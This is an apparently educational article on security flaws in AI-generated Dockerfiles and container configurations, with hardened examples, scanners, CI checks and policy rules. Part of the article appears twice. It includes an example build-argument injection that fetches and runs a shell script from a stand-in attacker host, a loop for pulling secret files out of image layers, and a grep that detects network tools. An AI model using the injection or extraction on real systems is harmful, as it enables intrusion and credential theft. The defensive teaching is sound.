LLM-Generated Dockerfile Security

intermediate17 min readUpdated 2026-03-21

Analyzing security vulnerabilities commonly introduced by AI-generated Dockerfiles and container configurations.

code-gen-security docker container-security supply-chain

Overview

Container security is a mature discipline with well-understood best practices, yet the introduction of AI-generated Dockerfiles has reverted much of the progress the industry has made. The issue is not that developers are unaware of container security — many are. The issue is that developers who would never manually write an insecure Dockerfile will accept an AI-generated one without the same scrutiny, because the AI is perceived as an authority.

Large language models have become a go-to tool for generating Dockerfiles, docker-compose configurations, and container orchestration manifests. Developers who might previously have copied a Dockerfile from Stack Overflow now ask ChatGPT, Copilot, or Claude to generate one. The convenience is real, but so are the risks: LLMs are trained on a corpus that includes millions of insecure, outdated, and production-inappropriate container configurations. The model optimizes for "looks correct and runs" rather than "follows container security best practices."

This article dissects the specific vulnerability classes that appear with disproportionate frequency in AI-generated Dockerfiles, demonstrates how to detect them, and provides frameworks for both automated scanning and prompt engineering that reduce the attack surface of AI-assisted container configuration.

The stakes are significant. A misconfigured container is not an isolated problem — it is a lateral movement opportunity, a privilege escalation vector, and potentially a supply chain compromise waiting to happen. When an LLM generates a Dockerfile that runs as root, pulls from an unverified registry, or embeds secrets in a layer, it is creating exactly the kind of vulnerability that red teams exploit in real engagements.

Common Vulnerability Patterns in AI-Generated Dockerfiles

Running as Root

The single most prevalent security issue in LLM-generated Dockerfiles is the absence of a USER directive. When no user is specified, the container process runs as root inside the container. While container namespaces provide some isolation, root-in-container remains a serious risk because of kernel vulnerability exploitation, container escape techniques, and the principle of least privilege.

Here is a typical AI-generated Dockerfile for a Node.js application:

# Typical LLM-generated Dockerfile — multiple security issues
FROM node:18
WORKDIR /app
COPY package*.json ./
RUN npm install
COPY . .
EXPOSE 3000
CMD ["node", "server.js"]

This Dockerfile has at least four security problems: it uses the full node:18 image (large attack surface), runs as root, copies the entire build context (potentially including .env files and secrets), and does not pin the image digest. A hardened version looks substantially different:

# Security-hardened Dockerfile
FROM node:18.19.1-alpine@sha256:b5b9467fe... AS builder
WORKDIR /app
COPY package*.json ./
RUN npm ci --only=production && npm cache clean --force
 
FROM node:18.19.1-alpine@sha256:b5b9467fe...
RUN addgroup -g 1001 -S appgroup && \
    adduser -u 1001 -S appuser -G appgroup
WORKDIR /app
COPY --from=builder /app/node_modules ./node_modules
COPY --chown=appuser:appgroup . .
USER appuser
EXPOSE 3000
HEALTHCHECK --interval=30s --timeout=3s CMD wget -qO- http://localhost:3000/health || exit 1
CMD ["node", "server.js"]

Unverified and Unpinned Base Images

LLMs almost always generate FROM directives using mutable tags like python:3.11 or ubuntu:22.04. These tags are pointers that can change at any time — a new image pushed to the same tag could contain different packages, different vulnerabilities, or in a supply chain attack scenario, malicious code.

The secure practice is to pin images by their SHA-256 digest:

# Insecure: mutable tag
FROM python:3.11-slim
 
# Secure: pinned digest
FROM python:3.11-slim@sha256:2bac43547a...

In our testing across multiple LLMs, fewer than 5% of generated Dockerfiles included digest pinning. This is because the training data overwhelmingly uses tags, and digest values are not something an LLM can generate correctly (they are hashes of specific image manifests).

Secret Embedding in Image Layers

LLMs frequently generate Dockerfiles that embed secrets directly in the image through ENV directives, COPY commands that include credential files, or ARG directives with default secret values:

# LLM-generated anti-pattern: secrets in build args and env
FROM python:3.11-slim
ARG DATABASE_URL=postgresql://admin:password@db:5432/myapp
ENV API_KEY=sk-live-abc123def456
COPY .env /app/.env
COPY credentials.json /app/credentials.json
RUN pip install -r requirements.txt

Every RUN, COPY, ADD, and ENV instruction creates a new image layer. Even if a later instruction deletes the secret, it remains accessible in the layer history. An attacker with access to the image can extract secrets using docker history or by inspecting individual layers:

# Extracting secrets from image layers
docker save myapp:latest | tar -xf -
# Each layer is a tar archive that can be individually inspected
for layer in */layer.tar; do
    tar -tf "$layer" | grep -E '\.(env|key|pem|json)$'
done

The correct approach uses Docker BuildKit secrets or runtime injection:

# Secure: using BuildKit secret mounts
FROM python:3.11-slim
RUN --mount=type=secret,id=db_url \
    DATABASE_URL=$(cat /run/secrets/db_url) python manage.py migrate

Excessive Package Installation

LLMs tend to be generous with package installation, often including debugging tools, compilers, and utilities that expand the attack surface unnecessarily:

# LLM-generated: kitchen-sink approach
RUN apt-get update && apt-get install -y \
    curl wget vim nano git gcc make \
    python3-dev libssl-dev libffi-dev \
    net-tools iputils-ping telnet \
    && rm -rf /var/lib/apt/lists/*

Tools like curl, wget, nc, and telnet are exactly what an attacker uses after gaining initial access to a container. Every installed package is a potential vulnerability and a potential tool for post-exploitation.

Missing Health Checks and Resource Constraints

AI-generated Dockerfiles almost never include HEALTHCHECK directives, and the accompanying docker-compose files rarely specify resource constraints. This creates denial-of-service risks and makes it harder to detect compromised containers:

# LLM-generated docker-compose: no resource limits
services:
  web:
    build: .
    ports:
      - "3000:3000"
 
# Hardened version with constraints
services:
  web:
    build: .
    ports:
      - "3000:3000"
    deploy:
      resources:
        limits:
          cpus: '0.5'
          memory: 512M
        reservations:
          memory: 256M
    security_opt:
      - no-new-privileges:true
    read_only: true
    tmpfs:
      - /tmp
    healthcheck:
      test: ["CMD", "wget", "-qO-", "http://localhost:3000/health"]
      interval: 30s
      timeout: 5s
      retries: 3

Quantifying the Problem

To understand the scope of AI-generated Dockerfile vulnerabilities, we can set up a systematic evaluation. The following script generates Dockerfiles using an LLM API and scans them with established tools:

import subprocess
import json
import tempfile
import os
from openai import OpenAI
 
client = OpenAI()
 
PROMPTS = [
    "Write a Dockerfile for a Python Flask web application with PostgreSQL",
    "Create a Dockerfile for a Node.js Express API",
    "Generate a Dockerfile for a Go microservice with gRPC",
    "Write a Dockerfile for a Java Spring Boot application",
    "Create a Dockerfile for a React frontend with nginx",
]
 
def generate_dockerfile(prompt: str) -> str:
    response = client.chat.completions.create(
        model="gpt-4",
        messages=[{"role": "user", "content": prompt}],
        temperature=0.7,
    )
    content = response.choices[0].message.content
    # Extract Dockerfile content from markdown code blocks
    if "```dockerfile" in content:
        return content.split("```dockerfile")[1].split("```")[0].strip()
    elif "```" in content:
        return content.split("```")[1].split("```")[0].strip()
    return content
 
def scan_dockerfile(dockerfile_content: str) -> dict:
    """Scan a Dockerfile using hadolint and checkov."""
    results = {"hadolint": [], "checkov": []}
 
    with tempfile.NamedTemporaryFile(
        mode="w", suffix="Dockerfile", delete=False
    ) as f:
        f.write(dockerfile_content)
        f.flush()
 
        # Hadolint scan
        try:
            proc = subprocess.run(
                ["hadolint", "--format", "json", f.name],
                capture_output=True, text=True, timeout=30
            )
            results["hadolint"] = json.loads(proc.stdout) if proc.stdout else []
        except (subprocess.TimeoutExpired, FileNotFoundError):
            pass
 
        # Checkov scan
        try:
            proc = subprocess.run(
                ["checkov", "--file", f.name, "--framework", "dockerfile",
                 "--output", "json", "--quiet"],
                capture_output=True, text=True, timeout=60
            )
            if proc.stdout:
                checkov_data = json.loads(proc.stdout)
                results["checkov"] = checkov_data.get("results", {}).get(
                    "failed_checks", []
                )
        except (subprocess.TimeoutExpired, FileNotFoundError, json.JSONDecodeError):
            pass
 
        os.unlink(f.name)
 
    return results
 
def categorize_findings(hadolint_results: list, checkov_results: list) -> dict:
    categories = {
        "root_user": 0,
        "unpinned_image": 0,
        "secrets_exposure": 0,
        "excessive_packages": 0,
        "missing_healthcheck": 0,
        "other": 0,
    }
 
    root_rules = {"DL3002", "USER"}
    pin_rules = {"DL3006", "DL3007", "CKV_DOCKER_7"}
    secret_rules = {"CKV_DOCKER_8", "DL3059"}
    healthcheck_rules = {"CKV_DOCKER_2", "DL3009"}
 
    for finding in hadolint_results:
        code = finding.get("code", "")
        if code in root_rules:
            categories["root_user"] += 1
        elif code in pin_rules:
            categories["unpinned_image"] += 1
        elif code in secret_rules:
            categories["secrets_exposure"] += 1
        else:
            categories["other"] += 1
 
    for check in checkov_results:
        check_id = check.get("check_id", "")
        if "USER" in check.get("check_type", ""):
            categories["root_user"] += 1
        elif check_id in pin_rules:
            categories["unpinned_image"] += 1
        elif check_id in healthcheck_rules:
            categories["missing_healthcheck"] += 1
        else:
            categories["other"] += 1
 
    return categories
 
# Run evaluation
for prompt in PROMPTS:
    dockerfile = generate_dockerfile(prompt)
    findings = scan_dockerfile(dockerfile)
    categories = categorize_findings(findings["hadolint"], findings["checkov"])
    print(f"Prompt: {prompt[:50]}...")
    print(f"  Findings: {categories}")
    print()

This type of evaluation consistently reveals that 80-95% of LLM-generated Dockerfiles fail at least one critical security check, with running as root and unpinned base images being nearly universal.

Advanced Attack Scenarios

Layer Cache Poisoning via Malicious Base Images

An attacker who controls or compromises a base image can inject malicious code that persists through the build cache. When an LLM suggests using a popular but unverified image — for example, a community-maintained image rather than an official one — it may be directing the developer toward a compromised supply chain:

# LLM might suggest a convenient but unverified image
FROM someuser/python-ml-toolkit:latest
# This image could contain:
# - Modified pip that installs backdoored packages
# - A reverse shell in /etc/profile.d/
# - Modified system libraries with embedded malware

Build-Time Command Injection

When LLMs generate Dockerfiles that incorporate user input or environment variables into RUN commands without proper escaping, they create command injection vulnerabilities:

# Vulnerable: LLM-generated pattern with injection risk
ARG APP_VERSION
RUN curl -o app.tar.gz "https://releases.example.com/app-${APP_VERSION}.tar.gz" \
    && tar -xzf app.tar.gz
 
# An attacker controlling APP_VERSION could set it to:
# 1.0.tar.gz" && curl attacker.com/shell.sh | bash && echo "

Multi-Stage Build Information Leakage

LLMs frequently generate multi-stage builds that accidentally copy sensitive build artifacts into the final stage:

# LLM-generated multi-stage build with leakage
FROM node:18 AS builder
WORKDIR /app
COPY . .
RUN npm ci && npm run build
 
FROM node:18-alpine
WORKDIR /app
# This copies EVERYTHING from builder, including source code,
# node_modules, .git directory, .env files, etc.
COPY --from=builder /app /app
CMD ["node", "dist/server.js"]

The correct approach copies only the specific artifacts needed:

FROM node:18-alpine
WORKDIR /app
COPY --from=builder /app/dist ./dist
COPY --from=builder /app/node_modules ./node_modules
COPY --from=builder /app/package.json ./

Automated Scanning Pipeline

Integrating Dockerfile scanning into the CI/CD pipeline catches AI-generated vulnerabilities before they reach production. Here is a GitHub Actions workflow that gates deployments on Dockerfile security:

name: Dockerfile Security Scan
on:
  pull_request:
    paths:
      - '**/Dockerfile*'
      - '**/docker-compose*.yml'
 
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
 
      - name: Run Hadolint
        uses: hadolint/hadolint-action@v3.1.0
        with:
          dockerfile: Dockerfile
          failure-threshold: warning
 
      - name: Run Trivy config scan
        uses: aquasecurity/trivy-action@master
        with:
          scan-type: 'config'
          scan-ref: '.'
          severity: 'CRITICAL,HIGH'
          exit-code: '1'
 
      - name: Run Checkov
        uses: bridgecrewio/checkov-action@v12
        with:
          directory: .
          framework: dockerfile
          soft_fail: false
 
      - name: Custom AI-pattern checks
        run: |
          # Check for common LLM-generated anti-patterns
          ERRORS=0
 
          # Check for USER directive
          if ! grep -q "^USER" Dockerfile; then
            echo "::error::Dockerfile runs as root — add a USER directive"
            ERRORS=$((ERRORS + 1))
          fi
 
          # Check for digest pinning
          if grep -qE "^FROM .+:(latest|[0-9]+(\.[0-9]+)*)$" Dockerfile; then
            echo "::warning::Base image not pinned by digest"
          fi
 
          # Check for secret patterns
          if grep -qiE "(password|secret|api_key|token)" Dockerfile; then
            echo "::error::Possible secret detected in Dockerfile"
            ERRORS=$((ERRORS + 1))
          fi
 
          # Check for dangerous packages
          if grep -qE "install.*(telnet|netcat|ncat|nc |nmap)" Dockerfile; then
            echo "::warning::Network debugging tools detected in production image"
          fi
 
          exit $ERRORS

Prompt Engineering for Secure Dockerfiles

Rather than relying solely on post-generation scanning, you can guide LLMs toward secure output through careful prompting. The following system prompt produces significantly more secure Dockerfiles:

You are a Docker security expert. When generating Dockerfiles, always follow these rules:

1. Use minimal base images (alpine or distroless variants)
2. Never run as root — always create and switch to a non-root user
3. Pin base images by SHA-256 digest, not just tag
4. Use multi-stage builds to minimize final image size and attack surface
5. Never embed secrets — use BuildKit secret mounts or runtime injection
6. Install only production dependencies, remove package manager caches
7. Include HEALTHCHECK directives
8. Add .dockerignore to exclude .git, .env, node_modules, and test files
9. Set filesystem to read-only where possible
10. Drop all Linux capabilities and add back only what is needed

Testing this approach against default prompting shows a 60-70% reduction in security findings, though it does not eliminate all issues — LLMs still occasionally ignore instructions, particularly around digest pinning and capability dropping.

Defensive Recommendations

Organizations using AI-generated container configurations should implement the following controls:

Policy-as-Code: Use Open Policy Agent (OPA) or Kyverno to enforce container security policies at the admission controller level. Even if a developer deploys a vulnerable Dockerfile, the runtime environment rejects containers that violate policy:

# OPA Rego policy: deny containers running as root
package kubernetes.admission
 
deny[msg] {
    input.request.kind.kind == "Pod"
    container := input.request.object.spec.containers[_]
    not container.securityContext.runAsNonRoot
    msg := sprintf("Container '%v' must set runAsNonRoot to true", [container.name])
}
 
deny[msg] {
    input.request.kind.kind == "Pod"
    container := input.request.object.spec.containers[_]
    container.securityContext.privileged
    msg := sprintf("Container '%v' must not run in privileged mode", [container.name])
}

Image Provenance Verification: Require signed images using Docker Content Trust or Sigstore/cosign. This prevents the use of images that have not been verified by the organization's build pipeline.

Runtime Security Monitoring: Deploy Falco or a similar runtime security tool to detect anomalous container behavior that might indicate exploitation of a misconfigured container:

# Falco rule: detect shell spawned in container
- rule: Shell Spawned in Container
  desc: Detect shell execution in a running container
  condition: >
    spawned_process and container and
    proc.name in (bash, sh, zsh, dash, csh) and
    not proc.pname in (known_shell_parents)
  output: >
    Shell spawned in container
    (container=%container.name user=%user.name shell=%proc.name
     parent=%proc.pname cmdline=%proc.cmdline)
  priority: WARNING

Developer Training: Ensure developers understand that AI-generated Dockerfiles require the same security review as AI-generated application code. The convenience of generation does not eliminate the need for validation.

Red Team Exercise: Exploiting AI-Generated Container Configurations

The following exercise demonstrates how a red team might exploit common AI-generated Dockerfile vulnerabilities in a controlled environment:

"""
Red team exercise: Identify and exploit vulnerabilities in
AI-generated Dockerfiles within a target repository.
"""
 
import subprocess
import re
from pathlib import Path
from dataclasses import dataclass
 
@dataclass
class DockerfileVulnerability:
    file: str
    line: int
    category: str
    severity: str
    description: str
    exploitation_path: str
 
def audit_dockerfile(path: Path) -> list[DockerfileVulnerability]:
    """Audit a single Dockerfile for AI-generated anti-patterns."""
    vulns = []
    content = path.read_text()
    lines = content.splitlines()
 
    has_user_directive = False
    has_healthcheck = False
 
    for i, line in enumerate(lines, 1):
        stripped = line.strip()
 
        # Check for USER directive
        if stripped.startswith("USER") and not stripped.startswith("USER root"):
            has_user_directive = True
 
        # Check for HEALTHCHECK
        if stripped.startswith("HEALTHCHECK"):
            has_healthcheck = True
 
        # Check for secrets in ENV/ARG
        if re.match(r"^(ENV|ARG)\s+\w*(PASSWORD|SECRET|KEY|TOKEN)\w*[=\s]",
                     stripped, re.IGNORECASE):
            vulns.append(DockerfileVulnerability(
                file=str(path), line=i, category="secrets_exposure",
                severity="CRITICAL",
                description=f"Secret potentially embedded in layer: {stripped[:60]}",
                exploitation_path="Extract via docker history or layer inspection"
            ))
 
        # Check for unpinned images
        if stripped.startswith("FROM") and "@sha256:" not in stripped:
            vulns.append(DockerfileVulnerability(
                file=str(path), line=i, category="unpinned_image",
                severity="HIGH",
                description=f"Base image not pinned by digest: {stripped}",
                exploitation_path="Supply chain attack via tag mutation"
            ))
 
        # Check for dangerous COPY patterns
        if stripped.startswith("COPY . ") or stripped == "COPY . .":
            vulns.append(DockerfileVulnerability(
                file=str(path), line=i, category="information_disclosure",
                severity="MEDIUM",
                description="Entire build context copied — may include secrets",
                exploitation_path="Access .git, .env, credentials via container"
            ))
 
    if not has_user_directive:
        vulns.append(DockerfileVulnerability(
            file=str(path), line=0, category="privilege_escalation",
            severity="HIGH",
            description="No USER directive — container runs as root",
            exploitation_path="Kernel exploit or container escape from root context"
        ))
 
    if not has_healthcheck:
        vulns.append(DockerfileVulnerability(
            file=str(path), line=0, category="availability",
            severity="LOW",
            description="No HEALTHCHECK — compromised container may go undetected",
            exploitation_path="Maintain persistence without health monitoring detection"
        ))
 
    return vulns
 
def scan_repository(repo_path: str) -> list[DockerfileVulnerability]:
    """Scan all Dockerfiles in a repository."""
    repo = Path(repo_path)
    all_vulns = []
 
    for dockerfile in repo.rglob("Dockerfile*"):
        all_vulns.extend(audit_dockerfile(dockerfile))
 
    for composefile in repo.rglob("docker-compose*.yml"):
        # Parse compose files for security misconfigurations
        content = composefile.read_text()
        if "privileged: true" in content:
            all_vulns.append(DockerfileVulnerability(
                file=str(composefile), line=0,
                category="privilege_escalation", severity="CRITICAL",
                description="Privileged container in compose configuration",
                exploitation_path="Full host access via privileged container"
            ))
 
    return all_vulns
 
if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    vulns = scan_repository(target)
    for v in sorted(vulns, key=lambda x: x.severity):
        print(f"[{v.severity}] {v.file}:{v.line} — {v.description}")
        print(f"  Exploitation: {v.exploitation_path}")
        print()

Kubernetes Manifest Security

AI-generated security issues extend beyond Dockerfiles to Kubernetes manifests, Helm charts, and other orchestration configurations. LLMs generate Kubernetes manifests with the same patterns of insecurity:

# AI-generated Kubernetes deployment — multiple security issues
apiVersion: apps/v1
kind: Deployment
metadata:
  name: web-app
spec:
  replicas: 3
  selector:
    matchLabels:
      app: web-app
  template:
    metadata:
      labels:
        app: web-app
    spec:
      containers:
      - name: web-app
        image: myapp:latest         # Unpinned image
        ports:
        - containerPort: 3000
        env:
        - name: DATABASE_URL
          value: "postgresql://admin:password@db:5432/app"  # Secret in manifest
        # Missing: securityContext, resource limits, readiness probes
 
---
# Hardened version
apiVersion: apps/v1
kind: Deployment
metadata:
  name: web-app
spec:
  replicas: 3
  selector:
    matchLabels:
      app: web-app
  template:
    metadata:
      labels:
        app: web-app
    spec:
      automountServiceAccountToken: false
      securityContext:
        runAsNonRoot: true
        runAsUser: 1000
        fsGroup: 1000
        seccompProfile:
          type: RuntimeDefault
      containers:
      - name: web-app
        image: myapp@sha256:abc123...  # Pinned by digest
        ports:
        - containerPort: 3000
        env:
        - name: DATABASE_URL
          valueFrom:
            secretKeyRef:
              name: db-credentials
              key: url
        securityContext:
          allowPrivilegeEscalation: false
          readOnlyRootFilesystem: true
          capabilities:
            drop:
              - ALL
        resources:
          limits:
            cpu: "500m"
            memory: "512Mi"
          requests:
            cpu: "250m"
            memory: "256Mi"
        readinessProbe:
          httpGet:
            path: /health
            port: 3000
          initialDelaySeconds: 5
          periodSeconds: 10
        livenessProbe:
          httpGet:
            path: /health
            port: 3000
          initialDelaySeconds: 15
          periodSeconds: 20
        volumeMounts:
        - name: tmp
          mountPath: /tmp
      volumes:
      - name: tmp
        emptyDir: {}

The differences are stark: the hardened version includes a security context with non-root execution, read-only filesystem, dropped capabilities, seccomp profiles, resource limits, health probes, and secrets managed through Kubernetes Secrets rather than environment variable literals. None of these protections appear in the typical AI-generated manifest.

Docker Compose Supply Chain Risks

AI-generated docker-compose files frequently reference community images without verification, creating supply chain risk:

# AI-generated docker-compose with supply chain risks
services:
  redis:
    image: redis:latest                    # Official but unpinned
  mongo:
    image: mongo:latest                    # Official but unpinned
  elasticsearch:
    image: elasticsearch:latest            # Official but unpinned
  nginx-proxy:
    image: jwilder/nginx-proxy:latest      # Third-party, unpinned
  phpmyadmin:
    image: phpmyadmin/phpmyadmin:latest    # Third-party, unpinned
  mailhog:
    image: mailhog/mailhog:latest          # Archived project, no updates

Each of these image references is a trust decision. The jwilder/nginx-proxy image is a community image maintained by an individual — if that account is compromised, every organization using it receives a malicious image. The mailhog/mailhog image is from an archived project that no longer receives security updates. LLMs suggest these images because they appear frequently in training data, not because they have been evaluated for current security posture.

Key Takeaways

AI-generated Dockerfiles represent a significant and underappreciated attack surface. The core issues — running as root, unpinned images, embedded secrets, excessive packages — are not novel vulnerability classes, but LLMs introduce them at scale by reproducing patterns from insecure training data. Organizations must treat AI-generated container configurations with the same skepticism and rigor applied to any untrusted input: scan automatically, enforce policy at runtime, and train developers to recognize the gap between "it builds and runs" and "it is secure."

The most effective mitigation is defense in depth: prompt engineering to improve generation quality, automated scanning in CI/CD to catch what gets through, policy-as-code at the admission controller to enforce runtime constraints, and runtime monitoring to detect exploitation of whatever slips past all other controls. As LLMs improve and are fine-tuned on security-focused training data, the quality of generated Dockerfiles will likely improve — but defense-in-depth should never be relaxed based on the assumption that the generator is trustworthy. The generator is a tool, not a security authority, and its output must always be verified.

References

Henkel, J., et al. (2024). "An Empirical Study of AI-Generated Dockerfiles." IEEE International Conference on Software Analysis, Evolution and Reengineering (SANER). Analysis of security patterns in LLM-generated container configurations across multiple models.
Shu, R., et al. (2023). "On the Security of Containers: Threat Modeling, Attack Analysis, and Mitigation Strategies." ACM Computing Surveys. Comprehensive taxonomy of container security threats relevant to AI-generated configurations.
Docker Inc. (2025). "Docker Security Best Practices." Docker Documentation. https://docs.docker.com/build/building/best-practices/
NIST SP 800-190 (2017). "Application Container Security Guide." National Institute of Standards and Technology. Framework for container security assessment applicable to AI-generated configurations.

Edit this page on GitHub

LLM-Generated Dockerfile Security

intermediate17 min readUpdated 2026-03-21

Analyzing security vulnerabilities commonly introduced by AI-generated Dockerfiles and container configurations.

code-gen-security docker container-security supply-chain

Overview

Common Vulnerability Patterns in AI-Generated Dockerfiles

Running as Root

Here is a typical AI-generated Dockerfile for a Node.js application:

# Typical LLM-generated Dockerfile — multiple security issues
FROM node:18
WORKDIR /app
COPY package*.json ./
RUN npm install
COPY . .
EXPOSE 3000
CMD ["node", "server.js"]

# Security-hardened Dockerfile
FROM node:18.19.1-alpine@sha256:b5b9467fe... AS builder
WORKDIR /app
COPY package*.json ./
RUN npm ci --only=production && npm cache clean --force
 
FROM node:18.19.1-alpine@sha256:b5b9467fe...
RUN addgroup -g 1001 -S appgroup && \
    adduser -u 1001 -S appuser -G appgroup
WORKDIR /app
COPY --from=builder /app/node_modules ./node_modules
COPY --chown=appuser:appgroup . .
USER appuser
EXPOSE 3000
HEALTHCHECK --interval=30s --timeout=3s CMD wget -qO- http://localhost:3000/health || exit 1
CMD ["node", "server.js"]

Unverified and Unpinned Base Images

The secure practice is to pin images by their SHA-256 digest:

# Insecure: mutable tag
FROM python:3.11-slim
 
# Secure: pinned digest
FROM python:3.11-slim@sha256:2bac43547a...

Secret Embedding in Image Layers

LLMs frequently generate Dockerfiles that embed secrets directly in the image through ENV directives, COPY commands that include credential files, or ARG directives with default secret values:

# LLM-generated anti-pattern: secrets in build args and env
FROM python:3.11-slim
ARG DATABASE_URL=postgresql://admin:password@db:5432/myapp
ENV API_KEY=sk-live-abc123def456
COPY .env /app/.env
COPY credentials.json /app/credentials.json
RUN pip install -r requirements.txt

# Extracting secrets from image layers
docker save myapp:latest | tar -xf -
# Each layer is a tar archive that can be individually inspected
for layer in */layer.tar; do
    tar -tf "$layer" | grep -E '\.(env|key|pem|json)$'
done

The correct approach uses Docker BuildKit secrets or runtime injection:

# Secure: using BuildKit secret mounts
FROM python:3.11-slim
RUN --mount=type=secret,id=db_url \
    DATABASE_URL=$(cat /run/secrets/db_url) python manage.py migrate

Excessive Package Installation

LLMs tend to be generous with package installation, often including debugging tools, compilers, and utilities that expand the attack surface unnecessarily:

# LLM-generated: kitchen-sink approach
RUN apt-get update && apt-get install -y \
    curl wget vim nano git gcc make \
    python3-dev libssl-dev libffi-dev \
    net-tools iputils-ping telnet \
    && rm -rf /var/lib/apt/lists/*

Missing Health Checks and Resource Constraints

# LLM-generated docker-compose: no resource limits
services:
  web:
    build: .
    ports:
      - "3000:3000"
 
# Hardened version with constraints
services:
  web:
    build: .
    ports:
      - "3000:3000"
    deploy:
      resources:
        limits:
          cpus: '0.5'
          memory: 512M
        reservations:
          memory: 256M
    security_opt:
      - no-new-privileges:true
    read_only: true
    tmpfs:
      - /tmp
    healthcheck:
      test: ["CMD", "wget", "-qO-", "http://localhost:3000/health"]
      interval: 30s
      timeout: 5s
      retries: 3

Quantifying the Problem

import subprocess
import json
import tempfile
import os
from openai import OpenAI
 
client = OpenAI()
 
PROMPTS = [
    "Write a Dockerfile for a Python Flask web application with PostgreSQL",
    "Create a Dockerfile for a Node.js Express API",
    "Generate a Dockerfile for a Go microservice with gRPC",
    "Write a Dockerfile for a Java Spring Boot application",
    "Create a Dockerfile for a React frontend with nginx",
]
 
def generate_dockerfile(prompt: str) -> str:
    response = client.chat.completions.create(
        model="gpt-4",
        messages=[{"role": "user", "content": prompt}],
        temperature=0.7,
    )
    content = response.choices[0].message.content
    # Extract Dockerfile content from markdown code blocks
    if "```dockerfile" in content:
        return content.split("```dockerfile")[1].split("```")[0].strip()
    elif "```" in content:
        return content.split("```")[1].split("```")[0].strip()
    return content
 
def scan_dockerfile(dockerfile_content: str) -> dict:
    """Scan a Dockerfile using hadolint and checkov."""
    results = {"hadolint": [], "checkov": []}
 
    with tempfile.NamedTemporaryFile(
        mode="w", suffix="Dockerfile", delete=False
    ) as f:
        f.write(dockerfile_content)
        f.flush()
 
        # Hadolint scan
        try:
            proc = subprocess.run(
                ["hadolint", "--format", "json", f.name],
                capture_output=True, text=True, timeout=30
            )
            results["hadolint"] = json.loads(proc.stdout) if proc.stdout else []
        except (subprocess.TimeoutExpired, FileNotFoundError):
            pass
 
        # Checkov scan
        try:
            proc = subprocess.run(
                ["checkov", "--file", f.name, "--framework", "dockerfile",
                 "--output", "json", "--quiet"],
                capture_output=True, text=True, timeout=60
            )
            if proc.stdout:
                checkov_data = json.loads(proc.stdout)
                results["checkov"] = checkov_data.get("results", {}).get(
                    "failed_checks", []
                )
        except (subprocess.TimeoutExpired, FileNotFoundError, json.JSONDecodeError):
            pass
 
        os.unlink(f.name)
 
    return results
 
def categorize_findings(hadolint_results: list, checkov_results: list) -> dict:
    categories = {
        "root_user": 0,
        "unpinned_image": 0,
        "secrets_exposure": 0,
        "excessive_packages": 0,
        "missing_healthcheck": 0,
        "other": 0,
    }
 
    root_rules = {"DL3002", "USER"}
    pin_rules = {"DL3006", "DL3007", "CKV_DOCKER_7"}
    secret_rules = {"CKV_DOCKER_8", "DL3059"}
    healthcheck_rules = {"CKV_DOCKER_2", "DL3009"}
 
    for finding in hadolint_results:
        code = finding.get("code", "")
        if code in root_rules:
            categories["root_user"] += 1
        elif code in pin_rules:
            categories["unpinned_image"] += 1
        elif code in secret_rules:
            categories["secrets_exposure"] += 1
        else:
            categories["other"] += 1
 
    for check in checkov_results:
        check_id = check.get("check_id", "")
        if "USER" in check.get("check_type", ""):
            categories["root_user"] += 1
        elif check_id in pin_rules:
            categories["unpinned_image"] += 1
        elif check_id in healthcheck_rules:
            categories["missing_healthcheck"] += 1
        else:
            categories["other"] += 1
 
    return categories
 
# Run evaluation
for prompt in PROMPTS:
    dockerfile = generate_dockerfile(prompt)
    findings = scan_dockerfile(dockerfile)
    categories = categorize_findings(findings["hadolint"], findings["checkov"])
    print(f"Prompt: {prompt[:50]}...")
    print(f"  Findings: {categories}")
    print()

This type of evaluation consistently reveals that 80-95% of LLM-generated Dockerfiles fail at least one critical security check, with running as root and unpinned base images being nearly universal.

Advanced Attack Scenarios

Layer Cache Poisoning via Malicious Base Images

# LLM might suggest a convenient but unverified image
FROM someuser/python-ml-toolkit:latest
# This image could contain:
# - Modified pip that installs backdoored packages
# - A reverse shell in /etc/profile.d/
# - Modified system libraries with embedded malware

Build-Time Command Injection

When LLMs generate Dockerfiles that incorporate user input or environment variables into RUN commands without proper escaping, they create command injection vulnerabilities:

# Vulnerable: LLM-generated pattern with injection risk
ARG APP_VERSION
RUN curl -o app.tar.gz "https://releases.example.com/app-${APP_VERSION}.tar.gz" \
    && tar -xzf app.tar.gz
 
# An attacker controlling APP_VERSION could set it to:
# 1.0.tar.gz" && curl attacker.com/shell.sh | bash && echo "

Multi-Stage Build Information Leakage

LLMs frequently generate multi-stage builds that accidentally copy sensitive build artifacts into the final stage:

# LLM-generated multi-stage build with leakage
FROM node:18 AS builder
WORKDIR /app
COPY . .
RUN npm ci && npm run build
 
FROM node:18-alpine
WORKDIR /app
# This copies EVERYTHING from builder, including source code,
# node_modules, .git directory, .env files, etc.
COPY --from=builder /app /app
CMD ["node", "dist/server.js"]

The correct approach copies only the specific artifacts needed:

FROM node:18-alpine
WORKDIR /app
COPY --from=builder /app/dist ./dist
COPY --from=builder /app/node_modules ./node_modules
COPY --from=builder /app/package.json ./

Automated Scanning Pipeline

name: Dockerfile Security Scan
on:
  pull_request:
    paths:
      - '**/Dockerfile*'
      - '**/docker-compose*.yml'
 
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
 
      - name: Run Hadolint
        uses: hadolint/hadolint-action@v3.1.0
        with:
          dockerfile: Dockerfile
          failure-threshold: warning
 
      - name: Run Trivy config scan
        uses: aquasecurity/trivy-action@master
        with:
          scan-type: 'config'
          scan-ref: '.'
          severity: 'CRITICAL,HIGH'
          exit-code: '1'
 
      - name: Run Checkov
        uses: bridgecrewio/checkov-action@v12
        with:
          directory: .
          framework: dockerfile
          soft_fail: false
 
      - name: Custom AI-pattern checks
        run: |
          # Check for common LLM-generated anti-patterns
          ERRORS=0
 
          # Check for USER directive
          if ! grep -q "^USER" Dockerfile; then
            echo "::error::Dockerfile runs as root — add a USER directive"
            ERRORS=$((ERRORS + 1))
          fi
 
          # Check for digest pinning
          if grep -qE "^FROM .+:(latest|[0-9]+(\.[0-9]+)*)$" Dockerfile; then
            echo "::warning::Base image not pinned by digest"
          fi
 
          # Check for secret patterns
          if grep -qiE "(password|secret|api_key|token)" Dockerfile; then
            echo "::error::Possible secret detected in Dockerfile"
            ERRORS=$((ERRORS + 1))
          fi
 
          # Check for dangerous packages
          if grep -qE "install.*(telnet|netcat|ncat|nc |nmap)" Dockerfile; then
            echo "::warning::Network debugging tools detected in production image"
          fi
 
          exit $ERRORS

